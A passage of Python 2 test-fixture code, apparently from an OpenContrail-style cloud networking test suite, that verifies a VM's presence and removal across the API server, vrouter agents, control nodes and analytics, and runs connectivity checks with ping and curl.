self.vm_in_api_flag = self.vm_in_api_flag and False
return False
ip_vn_fq_name = ':'.join(
instance_ip_obj['instance-ip']['virtual_network_refs'][0]['to'])
self.vm_ip_dict[ip_vn_fq_name] = ip
for vmi_obj in self.cs_vmi_objs[cfgm_ip]:
vmi_id = vmi_obj[
'virtual-machine-interface']['virtual_network_refs'][0]['uuid']
vmi_vn_fq_name = ':'.join(
vmi_obj['virtual-machine-interface']['virtual_network_refs'][0]['to'])
if vmi_id not in self.vn_ids:
with self.printlock:
self.logger.warn('VMI %s of VM %s is not mapped to the '
'right VN ID in API Server' % (vmi_id, self.vm_name))
self.vm_in_api_flag = self.vm_in_api_flag and False
return False
self.cs_vmi_obj[vmi_vn_fq_name] = vmi_obj
with self.printlock:
self.logger.info("API Server validations for VM %s passed in api server %s"
% (self.vm_name, cfgm_ip))
with self.printlock:
self.logger.info("API Server validations for VM %s passed"
% (self.vm_name))
self.vm_in_api_flag = self.vm_in_api_flag and True
return True
# end verify_vm_in_api_server
@retry(delay=2, tries=15)
def verify_vm_not_in_api_server(self):
self.verify_vm_not_in_api_server_flag = True
for ip in self.inputs.cfgm_ips:
self.logger.info("Verifying in api server %s" % (ip))
api_inspect = self.api_s_inspects[ip]
if api_inspect.get_cs_vm(self.vm_id, refresh=True) is not None:
with self.printlock:
self.logger.warn("VM ID %s of VM %s is still found in API Server"
% (self.vm_id, self.vm_name))
self.verify_vm_not_in_api_server_flag = self.verify_vm_not_in_api_server_flag and False
return False
if api_inspect.get_cs_vr_of_vm(self.vm_id, refresh=True) is not None:
with self.printlock:
self.logger.warn('API-Server still seems to have VM reference '
'for VM %s' % (self.vm_name))
self.verify_vm_not_in_api_server_flag = self.verify_vm_not_in_api_server_flag and False
return False
if api_inspect.get_cs_vmi_of_vm(
self.vm_id, refresh=True) is not None:
with self.printlock:
self.logger.warn("API-Server still has VMI info of VM %s"
% (self.vm_name))
self.verify_vm_not_in_api_server_flag = self.verify_vm_not_in_api_server_flag and False
return False
with self.printlock:
self.logger.info(
"VM %s information is fully removed in API-Server " % (self.vm_name))
self.verify_vm_not_in_api_server_flag = self.verify_vm_not_in_api_server_flag and True
return True
# end verify_vm_not_in_api_server
@retry(delay=2, tries=20)
def verify_vm_in_agent(self):
''' Verifies whether VM has got created properly in agent.
'''
self.vm_in_agent_flag = True
nova_host = self.inputs.host_data[
self.nova_fixture.get_nova_host_of_vm(self.vm_obj)]
self.vm_node_ip = nova_host['host_ip']
self.vm_node_data_ip = nova_host['host_data_ip']
inspect_h = self.agent_inspect[self.vm_node_ip]
for vn_fq_name in self.vn_fq_names:
fw_mode = self.vnc_lib_fixture.get_forwarding_mode(vn_fq_name)
(domain, project, vn) = vn_fq_name.split(':')
self.agent_vn_obj[vn_fq_name] = inspect_h.get_vna_vn(
domain, project, vn)
if not self.agent_vn_obj[vn_fq_name]:
with self.printlock:
self.logger.warn('VN %s is not seen in agent %s'
% (vn_fq_name, self.vm_node_ip))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
# Check if the VN ID matches between the Orchestration S and Agent
# if self.vn_id != self.agent_vn_obj['uuid']:
if self.agent_vn_obj[vn_fq_name]['uuid'] not in self.vn_ids:
with self.printlock:
self.logger.warn("VN UUID %s not created in agent in node %s"
% (vn_name, self.vm_node_ip))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
vna_tap_id = inspect_h.get_vna_tap_interface_by_vmi(
vmi_id=self.cs_vmi_obj[vn_fq_name]['virtual-machine-interface']['uuid'])
self.tap_intf[vn_fq_name] = vna_tap_id[0]
if not self.tap_intf[vn_fq_name]:
with self.printlock:
self.logger.error('Tap interface in VN %s for VM %s not '
'seen in agent %s '
% (vn_fq_name, self.vm_name, self.vm_node_ip))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
self.mac_addr[vn_fq_name] = self.tap_intf[vn_fq_name]['mac_addr']
if self.mac_addr[vn_fq_name] != self.cs_vmi_obj[vn_fq_name]['virtual-machine-interface']['virtual_machine_interface_mac_addresses']['mac_address'][0]:
with self.printlock:
self.logger.error('VM Mac address for VM %s not seen in '
'agent %s or VMI mac is not matching with API '
'Server information' % (self.vm_name, self.vm_node_ip))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
self.tap_intf[vn_fq_name] = inspect_h.get_vna_intf_details(
self.tap_intf[vn_fq_name]['name'])[0]
self.agent_vrf_name[vn_fq_name] = self.tap_intf[
vn_fq_name]['vrf_name']
self.agent_vrf_objs = inspect_h.get_vna_vrf_objs(
domain, project, vn)
self.agent_vrf_obj[vn_fq_name] = self.get_matching_vrf(
self.agent_vrf_objs['vrf_list'],
self.agent_vrf_name[vn_fq_name])
self.agent_vrf_id[vn_fq_name] = self.agent_vrf_obj[
vn_fq_name]['ucindex']
if fw_mode != unicode('l2'):
self.agent_path[vn_fq_name] = inspect_h.get_vna_active_route(
vrf_id=self.agent_vrf_id[vn_fq_name],
ip=self.vm_ip_dict[vn_fq_name],
prefix='32')
if not self.agent_path:
with self.printlock:
self.logger.warning('No path seen for VM IP %s in agent %s'
% (self.vm_ip_dict[vn_fq_name], self.vm_node_ip))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
self.agent_label[vn_fq_name] = self.agent_path[
vn_fq_name]['path_list'][0]['label']
# Check if Tap interface of VM is present in the Agent route
# table
if self.agent_path[vn_fq_name]['path_list'][0]['nh']['itf'] != self.tap_intf[vn_fq_name]['name']:
self.logger.warning("Active route in agent for %s is not "
"pointing to right tap interface. It is %s "
% (self.vm_ip_dict[vn_fq_name],
self.agent_path[vn_fq_name]['path_list'][0]['nh']['itf']))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
else:
with self.printlock:
self.logger.debug('Active route in agent is present for VMI '
'%s ' % (self.tap_intf[vn_fq_name]['name']))
if self.tap_intf[vn_fq_name]['label'] != self.agent_label[vn_fq_name]:
with self.printlock:
self.logger.warning('VM %s label mismatch! , Expected : %s ,'
' Got : %s' % (self.vm_name,
self.tap_intf[
vn_fq_name][
'label'],
self.agent_label[vn_fq_name]))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
else:
with self.printlock:
self.logger.debug('VM %s labels in tap-interface and the '
'route do match ' % (self.vm_name))
# Check if tap interface is set to Active
if self.tap_intf[vn_fq_name]['active'] != 'Active':
with self.printlock:
self.logger.warn('VM %s : Tap interface %s is not set to '
'Active, it is : %s ' % (self.vm_name,
self.tap_intf[
vn_fq_name][
'name'],
self.tap_intf[vn_fq_name]['active']))
else:
with self.printlock:
self.logger.debug('VM %s : Tap interface %s is set to '
' Active' % (self.vm_name,
self.tap_intf[vn_fq_name]['name']))
self.local_ips[vn_fq_name] = self.tap_intf[
vn_fq_name]['mdata_ip_addr']
with self.printlock:
self.logger.debug('VM %s : Tap interface %s is set to '
' Active' % (self.vm_name,
self.tap_intf[vn_fq_name]['name']))
self.local_ips[vn_fq_name] = self.tap_intf[
vn_fq_name]['mdata_ip_addr']
with self.printlock:
self.logger.debug('Tap interface %s detail : %s' % (
self.tap_intf[vn_fq_name]['name'], self.tap_intf[vn_fq_name]))
with self.printlock:
self.logger.info('Starting Layer 2 verification in Agent')
# L2 verification
self.agent_l2_path[vn_fq_name] = inspect_h.get_vna_layer2_route(
vrf_id=self.agent_vrf_id[vn_fq_name],
mac=self.mac_addr[vn_fq_name])
if not self.agent_l2_path[vn_fq_name]:
with self.printlock:
self.logger.warning('No Layer 2 path is seen for VM MAC '
'%s in agent %s' % (self.mac_addr[vn_fq_name],
self.vm_node_ip))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
else:
with self.printlock:
self.logger.info('Layer 2 path is seen for VM MAC %s '
'in agent %s' % (self.mac_addr[vn_fq_name],
self.vm_node_ip))
self.agent_l2_label[vn_fq_name] = self.agent_l2_path[
vn_fq_name]['routes'][0]['path_list'][0]['label']
self.agent_vxlan_id[vn_fq_name] = self.agent_l2_path[
vn_fq_name]['routes'][0]['path_list'][0]['vxlan_id']
# Check if Tap interface of VM is present in the Agent layer
# route table
if self.agent_l2_path[vn_fq_name]['routes'][0]['path_list'][0]['nh']['itf'] != self.tap_intf[vn_fq_name]['name']:
with self.printlock:
self.logger.warning("Active layer 2 route in agent for "
"%s is not pointing to right tap interface. It is %s "
'' % (self.vm_ip_dict[vn_fq_name],
self.agent_l2_path[vn_fq_name]['routes'][0]['path_list'][0]['nh']['itf']))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
else:
with self.printlock:
self.logger.info(
'Active layer 2 route in agent is present for VMI %s ' %
(self.tap_intf[vn_fq_name]['name']))
# TODO layer 2 label match is not possibole now as intreface introspect does not have l2 label now.
# Bug 1730
# L2 verification end here
# Check if VN for the VM and route for the VM is present on all
# compute nodes
if not self.verify_in_all_agents(vn_fq_name):
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
# end for vn_fq_name in self.vn_fq_names
self.local_ip = self.local_ips.values()[0]
# Ping to VM IP from host
ping_result = False
for vn_fq_name in self.vn_fq_names:
if self.local_ips[vn_fq_name] != '0.0.0.0':
if self.ping_vm_from_host(vn_fq_name) or self.ping_vm_from_host(vn_fq_name):
ping_result = True
self.local_ip = self.local_ips[vn_fq_name]
with self.printlock:
self.logger.info('The local IP is %s' % self.local_ip)
break
if not ping_result:
with self.printlock:
self.logger.error('Ping to one of the 169.254.x.x IPs of the VM '
'should have passed. It failed! ')
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
with self.printlock:
self.logger.info("VM %s Verifications in Agent is fine" %
(self.vm_name))
self.vm_in_agent_flag = self.vm_in_agent_flag and True
return True
# end verify_vm_in_agent
def get_matching_vrf(self, vrf_objs, vrf_name):
return [x for x in vrf_objs if x['name'] == vrf_name][0]
def reset_state(self, state):
self.obj.reset_state(state)
def ping_vm_from_host(self, vn_fq_name):
''' Ping the VM metadata IP from the host
'''
host = self.inputs.host_data[self.vm_node_ip]
output = ''
with hide('everything'):
with settings(
host_string='%s@%s' % (host['username'], self.vm_node_ip),
password=host['password'],
warn_only=True, abort_on_prompts=False):
output = run('ping %s -c 1' % (self.local_ips[vn_fq_name]))
expected_result = ' 0% packet loss'
self.logger.debug(output)
if expected_result not in output:
self.logger.warn(
"Ping to Metadata IP %s of VM %s failed!" %
(self.local_ips[vn_fq_name], self.vm_name))
return False
else:
self.logger.info(
'Ping to Metadata IP %s of VM %s passed' %
(self.local_ips[vn_fq_name], self.vm_name))
return True
# end ping_vm_from_host
def verify_in_all_agents(self, vn_fq_name):
''' Verify if the corresponding VN for a VM is present in all compute nodes.
Also verifies that a route is present in all compute nodes for the VM IP
'''
(domain, project, vn_name) = vn_fq_name.split(':')
for compute_ip in self.inputs.compute_ips:
inspect_h = self.agent_inspect[compute_ip]
vn = inspect_h.get_vna_vn(domain, project, vn_name)
# The VN for the VM under test may or may not be present on other agent
# nodes. Proceed to check only if VN is present
if vn is None:
continue
if vn['name'] != vn_fq_name:
self.logger.warn(
'VN %s in agent is not the same as expected : %s ' %
(vn['name'], vn_fq_name))
return False
else:
self.logger.debug('VN %s is found in Agent of node %s' %
(vn['name'], compute_ip))
if not vn['uuid'] in self.vn_ids:
self.logger.warn(
'VN ID %s from agent is in VN IDs list %s of the VM in '
'Agent node %s' % (vn['uuid'], self.vn_ids, compute_ip))
return False
# TODO : To be uncommented once the sandesh query with service-chaining works
# if vn['vrf_name'] != self.agent_vrf_name :
# self.logger.warn('VN VRF of %s in agent is not the same as expected VRF of %s' %( vn['vrf_name'], self.agent_vrf_name ))
# return False
agent_vrf_objs = inspect_h.get_vna_vrf_objs(
domain, project, vn_name)
agent_vrf_obj = self.get_matching_vrf(
self.agent_vrf_objs['vrf_list'],
self.agent_vrf_name[vn_fq_name])
agent_vrf_id = self.agent_vrf_obj[vn_fq_name]['ucindex']
if agent_vrf_id != self.agent_vrf_id[vn_fq_name]:
self.logger.warn(
'VRF id of VN %s is not the same across all agents. '
'Expected : %s, Seen : %s' % (vn['name'],
self.agent_vrf_id[vn_fq_name], agent_vrf_id))
return False
fw_mode = self.vnc_lib_fixture.get_forwarding_mode(vn_fq_name)
if fw_mode != unicode('l2'):
agent_path = inspect_h.get_vna_active_route(
vrf_id=self.agent_vrf_id[vn_fq_name],
ip=self.vm_ip_dict[vn_fq_name], prefix='32')
agent_label = self.agent_path[
vn_fq_name]['path_list'][0]['label']
if agent_label != self.agent_label[vn_fq_name]:
self.logger.warn(
'The route for VM IP %s in Node %s is having incorrect '
'label. Expected : %s, Seen : %s' % (
self.vm_ip_dict[vn_fq_name], compute_ip,
self.agent_label[vn_fq_name], agent_label))
return False
self.logger.debug(
'VRF IDs of VN %s is consistent in agent %s' %
(vn_fq_name, compute_ip))
self.logger.debug(
'Route for VM IP %s is consistent in agent %s ' %
(self.vm_ip_dict[vn_fq_name], compute_ip))
self.logger.debug(
'VN %s verification for VM %s in Agent %s passed ' %
(vn_fq_name, self.vm_name, compute_ip))
self.logger.info(
'Starting all layer 2 verification in agent %s' % (compute_ip))
agent_l2_path = inspect_h.get_vna_layer2_route(
vrf_id=self.agent_vrf_id[vn_fq_name],
mac=self.mac_addr[vn_fq_name])
agent_l2_label = self.agent_l2_path[vn_fq_name][
'routes'][0]['path_list'][0]['label']
if agent_l2_label != self.agent_l2_label[vn_fq_name]:
self.logger.warn('The route for VM MAC %s in Node %s '
'is having incorrect label. Expected : %s, Seen : %s'
% (self.mac_addr[vn_fq_name], compute_ip,
self.agent_l2_label[vn_fq_name], agent_l2_label))
return False
self.logger.info(
'Route for VM MAC %s is consistent in agent %s ' %
(self.mac_addr[vn_fq_name], compute_ip))
# end for
return True
# end verify_in_all_agents
def ping_to_ip(self, ip, return_output=False, other_opt='', size='56', count='5'):
'''Ping from a VM to an IP specified.
This method logs into the VM from the host machine using ssh and runs ping test to an IP.
'''
host = self.inputs.host_data[self.vm_node_ip]
output = ''
fab_connections.clear()
try:
self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
with hide('everything'):
with settings(host_string='%s@%s' % (host['username'],
self.vm_node_ip), password=host[
'password'],
warn_only=True, abort_on_prompts=False):
key_file = self.nova_fixture.tmp_key_file
output = run_fab_cmd_on_node(
host_string='%s@%s' % (
self.vm_username, self.local_ip),
password=self.vm_password,
cmd='ping -s %s -c %s %s %s' % (str(size), str(count), other_opt, ip))
self.logger.debug(output)
if return_output == True:
# return_list=[]
return output
except Exception, e:
self.logger.exception(
'Exception occured while trying ping from VM ')
return False
expected_result = ' 0% packet loss'
if expected_result not in output:
self.logger.warn("Ping to IP %s from VM %s failed" %
(ip, self.vm_name))
return False
else:
self.logger.info('Ping to IP %s from VM %s passed' %
(ip, self.vm_name))
return True
# end ping_to_ip
def ping_to_ipv6(self, ipv6, return_output=False, other_opt='', count='5', intf='eth0'):
'''Ping from a VM to an IPV6 specified.
This method logs into the VM from the host machine using ssh and runs ping6 test to an IPV6.
'''
host = self.inputs.host_data[self.vm_node_ip]
output = ''
fab_connections.clear()
try:
self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
with hide('everything'):
with settings(
host_string='%s@%s' % (
host['username'], self.vm_node_ip),
password=host['password'],
warn_only=True, abort_on_prompts=False):
key_file = self.nova_fixture.tmp_key_file
output = run_fab_cmd_on_node(
host_string='%s@%s' % (
self.vm_username, self.local_ip),
password=self.vm_password,
cmd='ping6 -I %s -c %s %s %s' % (str(intf), str(count), other_opt, ipv6))
self.logger.debug(output)
if return_output == True:
return output
except Exception, e:
self.logger.exception(
'Exception occured while trying ping from VM ')
return False
expected_result = ' 0% packet loss'
if expected_result not in output:
self.logger.warn("Ping6 to IPv6 %s from VM %s failed" %
(ipv6, self.vm_name))
return False
else:
self.logger.debug('Ping6 to IP %s from VM %s passed' %
(ipv6, self.vm_name))
return True
# end ping_to_ipv6
@retry(delay=1, tries=20)
def ping_with_certainty(self, ip, return_output=False, other_opt='', size='56', count='5', expectation=True):
'''
Better to call this instead of ping_to_ip.
Set expectation to False if you want ping to fail
Can be used for both ping pass and fail scenarios with retry
'''
if expectation:
return self.ping_to_ip(ip, return_output, other_opt, size, count)
else:
return not self.ping_to_ip(ip, return_output, other_opt, size, count)
@retry(delay=2, tries=20)
def verify_vm_not_in_agent(self):
'''Verify that the VM is fully removed in all Agents.
'''
result = True
self.verify_vm_not_in_agent_flag = True
inspect_h = self.agent_inspect[self.vm_node_ip]
if self.vm_obj in self.nova_fixture.get_vm_list():
with self.printlock:
self.logger.warn("VM %s is still found in Compute(nova) "
"server-list" % (self.vm_name))
self.verify_vm_not_in_agent_flag = self.verify_vm_not_in_agent_flag and False
result = result and False
# Check if VM is in agent's active VMList:
if self.vm_id in inspect_h.get_vna_vm_list():
with self.printlock:
self.logger.warn("VM %s is still present in agent's active "
"VMList" % (self.vm_name))
self.verify_vm_not_in_agent_flag = self.verify_vm_not_in_agent_flag and False
result = result and False
if len(inspect_h.get_vna_tap_interface_by_vm(vm_id=self.vm_id)) != 0:
with self.printlock:
self.logger.warn("VMI/TAP interface(s) is still seen for VM "
"%s in agent" % (self.vm_name))
self.verify_vm_not_in_agent_flag = self.verify_vm_not_in_agent_flag and False
result = result and False
for vn_fq_name in self.vn_fq_names:
for compute_ip in self.inputs.compute_ips:
inspect_h = self.agent_inspect[compute_ip]
if inspect_h.get_vna_active_route(
vrf_id=self.agent_vrf_id[vn_fq_name],
ip=self.vm_ip_dict[vn_fq_name],
prefix='32') is not None:
self.logger.warn(
"Route for VM %s, IP %s is still seen in agent %s " %
(self.vm_name, self.vm_ip_dict[vn_fq_name], compute_ip))
self.verify_vm_not_in_agent_flag = self.verify_vm_not_in_agent_flag and False
result = result and False
if result:
self.logger.info(
"VM %s is removed in Compute, and routes are removed "
"in all agent nodes" % (self.vm_name))
return result
# end verify_vm_not_in_agent
def get_control_nodes(self):
bgp_ips = {}
vm_host = self.vm_node_ip
try:
bgp_ips = self.inputs.build_compute_to_control_xmpp_connection_dict(self.connections)
bgp_ips = bgp_ips[vm_host]
except Exception as e:
self.logger.exception("Exception in get_control_nodes....")
finally:
return bgp_ips
@retry(delay=5, tries=6)
def verify_vm_in_control_nodes(self):
''' Validate routes are created in Control-nodes for this VM
'''
self.vm_in_cn_flag = True
self.ri_names={}
if (len(self.inputs.bgp_ips) <= 2):
self.bgp_ips = []
self.bgp_ips = self.inputs.bgp_ips[:]
else:
self.bgp_ips = self.get_control_nodes()
for vn_fq_name in self.vn_fq_names:
fw_mode= self.vnc_lib_fixture.get_forwarding_mode(vn_fq_name)
# for cn in self.inputs.bgp_ips:
for cn in self.bgp_ips:
vn_name= vn_fq_name.split(':')[-1]
ri_name= vn_fq_name + ':' + vn_name
self.ri_names[vn_fq_name]= ri_name
if fw_mode != unicode('l2'):
# Check for VM route in each control-node
#vn_name= vn_fq_name.split(':')[-1]
#ri_name= vn_fq_name + ':' + vn_name
#self.ri_names[vn_fq_name]= ri_name
cn_routes = self.cn_inspect[cn].get_cn_route_table_entry(
ri_name=ri_name,
prefix=self.vm_ip_dict[vn_fq_name] + '/32')
if not cn_routes:
with self.printlock:
self.logger.warn(
'No route found for VM IP %s in Control-node %s' %
(self.vm_ip_dict[vn_fq_name], cn))
self.vm_in_cn_flag = self.vm_in_cn_flag and False
return False
if cn_routes[0]['next_hop'] != self.vm_node_data_ip:
with self.printlock:
self.logger.warn(
'Next hop for VM %s is not set to %s in Control-node'
' Route table' % (self.vm_name, self.vm_node_data_ip))
self.vm_in_cn_flag = self.vm_in_cn_flag and False
return False
# Label in agent and control-node should match
if cn_routes[0]['label'] != self.agent_label[vn_fq_name]:
with self.printlock:
self.logger.warn(
"Label for VM %s differs between Control-node "
"%s and Agent, Expected: %s, Seen: %s" %
(self.vm_name, cn, self.agent_label[
vn_fq_name],
cn_routes[0]['label']))
self.logger.debug(
'Route in CN %s : %s' % (cn, str(cn_routes)))
self.vm_in_cn_flag = self.vm_in_cn_flag and False
return False
self.logger.info(
'Starting all layer2 verification in %s Control Node' % (cn))
# L2 verification
prefix = self.mac_addr[vn_fq_name] + \
',' + self.vm_ip_dict[vn_fq_name] + '/32'
cn_l2_routes = self.cn_inspect[cn].get_cn_route_table_entry(
ri_name=ri_name, prefix=prefix, table='enet.0')
if not cn_l2_routes:
self.logger.warn(
'No layer2 route found for VM MAC %s in Control-node %s'
'' % (self.mac_addr[vn_fq_name], cn))
self.vm_in_cn_flag = self.vm_in_cn_flag and False
return False
else:
self.logger.info(
'Layer2 route found for VM MAC %s in \
Control-node %s' % (self.mac_addr[vn_fq_name], cn))
if cn_l2_routes[0]['next_hop'] != self.vm_node_data_ip:
self.logger.warn(
"Next hop for VM %s is not set to %s in "
"Control-node Route table" % (self.vm_name,
self.vm_node_data_ip))
self.vm_in_cn_flag = self.vm_in_cn_flag and False
return False
if cn_l2_routes[0]['tunnel_encap'][0] == 'vxlan':
# Label in agent and control-node should match
if cn_l2_routes[0]['label'] != self.agent_vxlan_id[vn_fq_name]:
with self.printlock:
self.logger.warn(
"L2 Label for VM %s differs between Control-node "
"%s and Agent, Expected: %s, Seen: %s" %
(self.vm_name, cn, self.agent_vxlan_id[
vn_fq_name],
cn_l2_routes[0]['label']))
self.logger.debug(
'Route in CN %s : %s' % (cn, str(cn_l2_routes)))
self.vm_in_cn_flag = self.vm_in_cn_flag and False
return False
else:
with self.printlock:
self.logger.info(
"L2 Label for VM %s same between Control-node "
"%s and Agent, Expected: %s, Seen: %s" %
(self.vm_name, cn,
self.agent_vxlan_id[vn_fq_name],
cn_l2_routes[0]['label']))
else:
# Label in agent and control-node should match
if cn_l2_routes[0]['label'] != self.agent_l2_label[vn_fq_name]:
with self.printlock:
self.logger.warn(
"L2 Label for VM %s differs between Control-node "
"%s and Agent, Expected: %s, Seen: %s" %
(self.vm_name, cn, self.agent_l2_label[
vn_fq_name],
cn_l2_routes[0]['label']))
self.logger.debug(
'Route in CN %s : %s' % (cn, str(cn_l2_routes)))
self.vm_in_cn_flag = self.vm_in_cn_flag and False
return False
else:
with self.printlock:
self.logger.info(
"L2 Label for VM %s same between Control-node "
"%s and Agent, Expected: %s, Seen: %s" %
(self.vm_name, cn,
self.agent_l2_label[vn_fq_name],
cn_l2_routes[0]['label']))
# end for
self.vm_in_cn_flag = self.vm_in_cn_flag and True
with self.printlock:
self.logger.info(
"Verification in Control-nodes for VM %s passed" % (self.vm_name))
return True
# end verify_vm_in_control_nodes
@retry(delay=2, tries=15)
def verify_vm_not_in_control_nodes(self):
''' Validate that routes for VM is removed in control-nodes.
'''
result = True
self.verify_vm_not_in_control_nodes_flag = True
for vn_fq_name in self.vn_fq_names:
# for cn in self.inputs.bgp_ips:
for cn in self.bgp_ips:
# Check for VM route in each control-node
routing_instance = self.cn_inspect[cn].get_cn_routing_instance(
ri_name=self.ri_names[vn_fq_name])
cn_routes = self.cn_inspect[cn].get_cn_route_table_entry(
ri_name=self.ri_names[vn_fq_name],
prefix=self.vm_ip_dict[vn_fq_name] + '/32')
if cn_routes is not None:
with self.printlock:
self.logger.warn(
"Control-node %s still seems to have route for VMIP %s" %
(cn, self.vm_ip_dict[vn_fq_name]))
self.verify_vm_not_in_control_nodes_flag = self.verify_vm_not_in_control_nodes_flag and False
result = result and False
# end for
if result:
with self.printlock:
self.logger.info(
"Routes for VM %s is removed in all control-nodes"
% (self.vm_name))
return result
# end verify_vm_not_in_control_nodes
def _get_ops_intf_index(self, ops_intf_list, vn_fq_name):
for intf in ops_intf_list:
if intf['virtual_network'] == vn_fq_name:
return ops_intf_list.index(intf)
return None
@retry(delay=2, tries=15)
def verify_vm_in_opserver(self):
''' Verify VM objects in Opserver.
'''
self.logger.info("Verifying the vm in opserver")
result = True
self.vm_in_op_flag = True
for ip in self.inputs.collector_ips:
self.logger.info("Verifying in collector %s ..." % (ip))
self.ops_vm_obj = self.ops_inspect[ip].get_ops_vm(self.vm_id)
ops_intf_list = self.ops_vm_obj.get_attr('Agent', 'interface_list')
if not ops_intf_list:
self.logger.warn(
'Failed to get VM %s, ID %s info from Opserver' %
(self.vm_name, self.vm_id))
self.vm_in_op_flag = self.vm_in_op_flag and False
return False
for vn_fq_name in self.vn_fq_names:
vm_in_pkts = None
vm_out_pkts = None
fw_mode = self.vnc_lib_fixture.get_forwarding_mode(vn_fq_name)
ops_index = self._get_ops_intf_index(ops_intf_list, vn_fq_name)
if ops_index is None:
self.logger.error(
'VN %s is not seen in opserver for VM %s' %
(vn_fq_name, self.vm_id))
self.vm_in_op_flag = self.vm_in_op_flag and False
return False
ops_data = ops_intf_list[ops_index]
if fw_mode != unicode('l2'):
if self.vm_ip_dict[vn_fq_name] != ops_data['ip_address']:
self.logger.warn(
"VM %s IP Address of %s not in Opserver VM view"
" " % (self.vm_name, self.vm_ip_dict[vn_fq_name]))
self.vm_in_op_flag = self.vm_in_op_flag and False
result = result and False
# end if
self.ops_vm_obj = self.ops_inspect[ip].get_ops_vm(self.vm_id)
# end if
self.logger.info("Verifying vm in vn uve")
for intf in ops_intf_list:
virtual_network = intf['virtual_network']
ip_address = intf['ip_address']
intf_name = intf['name']
self.logger.info("vm uve shows interface as %s" % (intf_name))
if fw_mode != unicode('l2'):
self.logger.info("vm uve shows ip address as %s" %
(ip_address))
self.logger.info("vm uve shows virtual netowrk as %s" %
(virtual_network))
vm_in_vn_uve = self.analytics_obj.verify_vn_uve_for_vm(
vn_fq_name=virtual_network, vm=self.vm_id)
if vm_in_vn_uve:
self.vm_in_op_flag = self.vm_in_op_flag and True
result = result and True
else:
self.vm_in_op_flag = self.vm_in_op_flag and False
result = result and False
# Verifying vm in vrouter-uve
self.logger.info("Verifying vm in vrouter uve")
computes = []
for ip in self.inputs.collector_ips:
self.logger.info("Getting info from collector %s.." % (ip))
agent_host = self.analytics_obj.get_ops_vm_uve_vm_host(
ip, self.vm_id)
if agent_host not in computes:
computes.append(agent_host)
if (len(computes) > 1):
self.logger.warn(
"Inconsistancy - collectors dont have consistant info for vm uve")
self.vm_in_op_flag = self.vm_in_op_flag and False
result = result and False
self.logger.info("vm uve shows vrouter as %s" % (computes))
for compute in computes:
vm_in_vrouter = self.analytics_obj.verify_vm_list_in_vrouter_uve(
vm_uuid=self.vm_id, vrouter=compute)
if vm_in_vrouter:
self.vm_in_op_flag = self.vm_in_op_flag and True
result = result and True
else:
self.vm_in_op_flag = self.vm_in_op_flag and False
result = result and False
# Verify tap interface/conected networks in vrouter uve
self.logger.info("Verifying vm tap interface/vn in vrouter uve")
self.vm_host = self.inputs.host_data[self.vm_node_ip]['name']
self.tap_interfaces = self.agent_inspect[
self.vm_node_ip].get_vna_tap_interface_by_vm(vm_id=self.vm_id)
for intf in self.tap_interfaces:
self.tap_interface = intf['config_name']
self.logger.info("expected tap interface of vm uuid %s is %s" %
(self.vm_id, self.tap_interface))
self.logger.info("expected virtual network of vm uuid %s is %s" %
(self.vm_id, intf['vn_name']))
is_tap_thr = self.analytics_obj.verify_vm_list_in_vrouter_uve(
vm_uuid=self.vm_id,
vn_fq_name=intf['vn_name'],
vrouter=self.vm_host,
tap=self.tap_interface)
if is_tap_thr:
self.vm_in_op_flag = self.vm_in_op_flag and True
result = result and True
else:
self.vm_in_op_flag = self.vm_in_op_flag and False
result = result and False
if self.analytics_obj.verify_vm_link(self.vm_id):
self.vm_in_op_flag = self.vm_in_op_flag and True
result = result and True
else:
self.vm_in_op_flag = self.vm_in_op_flag and False
result = result and False
if result:
self.logger.info("VM %s validation in Opserver passed" %
(self.vm_name))
else:
self.logger.warn('VM %s validation in Opserver failed' %
(self.vm_name))
return result
# end verify_vm_in_opserver
@retry(delay=3, tries=15)
def tcp_data_transfer(self, localip, fip, datasize=1024):
'''Send data file from a VM to an IP specified.
This method logs into the VM from the host machine using ssh and sends a
data file to an IP.
'''
output = ''
url = 'http://%s/' % fip
cmd = 'curl -I -m 25 --connect-timeout 25 %s' % url
self.run_cmd_on_vm(cmds=[cmd])
output = self.return_output_values_list[0]
if '200 OK' not in output:
self.logger.warn("Tcp data transfer to IP %s from VM %s"
" failed" % (fip, self.vm_name))
return False
else:
self.logger.info("Tcp data transfer to IP %s from VM %s"
" Passed" % (fip, self.vm_name))
return True
# end tcp_data_transfer
def cleanUp(self):
super(VMFixture, self).cleanUp()
do_cleanup = True
if self.inputs.fixture_cleanup == 'no':
do_cleanup = False
if self.already_present:
do_cleanup = False
if self.inputs.fixture_cleanup == 'force':
do_cleanup = True
if do_cleanup:
if self.inputs.webui_config_flag:
self.webui.vm_delete_in_openstack(self)
else:
for vm_obj in self.vm_objs:
for sec_grp in self.sg_ids:
self.logger.info(
"Removing the security group from VM %s" % (vm_obj.name))
self.remove_security_group(sec_grp)
self.logger.info("Deleting the VM %s" % (vm_obj.name))
self.nova_fixture.delete_vm(vm_obj)
time.sleep(5)
# Not expected to do verification when self.count is > 1, right now
if self.verify_is_run:
t_api = threading.Thread(
target=self.verify_vm_not_in_api_server, args=())
# t_api.daemon = True
t_api.start()
time.sleep(1)
t_agent = threading.Thread(
target=self.verify_vm_not_in_agent, args=())
t_agent.start()
time.sleep(1)
t_cn = threading.Thread(
target=self.verify_vm_not_in_control_nodes, args=())
t_cn.start()
time.sleep(1)
t_nova = threading.Thread(
target=self.verify_vm_not_in_nova, args=())
t_nova.start()
time.sleep(1)
t_flow = threading.Thread(
target=self.verify_vm_flows_removed, args=())
t_flow.start()
time.sleep(1)
t_op_list = []
for vn_fq_name in self.vn_fq_names:
t_op = threading.Thread(
target=self.analytics_obj.verify_vm_not_in_opserver,
args=(self.vm_id, self.inputs.host_data[self.vm_node_ip]['name'], vn_fq_name))
t_op.start()
time.sleep(1)
t_op_list.append(t_op)
t_nova.join()
t_api.join()
t_agent.join()
t_cn.join()
for t in t_op_list:
t.join()
